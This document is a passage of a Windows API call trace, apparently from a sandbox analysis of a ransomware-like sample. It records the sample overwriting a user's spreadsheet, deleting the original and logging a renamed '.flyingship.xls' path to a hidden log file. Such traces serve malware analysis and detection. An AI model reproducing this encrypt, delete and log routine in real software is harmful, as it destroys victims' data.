0x9c26e8 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.595] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd438, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0176.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.596] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0176.596] WriteFile (in: hFile=0x120, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x14fb7, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x14fb7, lpOverlapped=0x0) returned 1 [0176.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0176.597] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0176.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.598] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.598] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0176.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.598] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.600] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.601] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.601] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.601] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.601] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", lpFilePart=0x0) returned 0x34 [0176.602] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0e05420, ftCreationTime.dwHighDateTime=0x1d5da04, ftLastAccessTime.dwLowDateTime=0x508ab760, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0xe9a92e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14fb7, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Pwvig6N-.xls", cAlternateFileName="")) returned 0x90af58 [0176.603] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pwvig6n-.xls")) returned 1 [0176.608] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0e05420, ftCreationTime.dwHighDateTime=0x1d5da04, ftLastAccessTime.dwLowDateTime=0x508ab760, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0xe9a92e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14fb7, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Pwvig6N-.xls", cAlternateFileName="")) returned 0 [0176.608] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0176.608] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.609] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.609] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0176.609] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.609] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0176.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.609] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0176.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.609] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0176.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0176.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.610] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0176.610] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.611] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.611] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0176.611] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.611] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0176.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0176.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0176.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.612] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0176.613] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x15c7, lpOverlapped=0x0) returned 1 [0176.613] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0176.613] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x15c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.613] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0176.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0176.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0176.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.flyingship.xls\r\n", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0176.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42) returned 0x9aa4f8 [0176.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.flyingship.xls\r\n", cchWideChar=66, lpMultiByteStr=0x9aa4f8, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.flyingship.xls\r\n", lpUsedDefaultChar=0x0) returned 66 [0176.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0176.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0176.613] WriteFile (in: hFile=0x120, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x41, lpOverlapped=0x0) returned 1 [0176.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0176.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.614] CloseHandle (hObject=0x120) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0176.615] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0176.615] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, 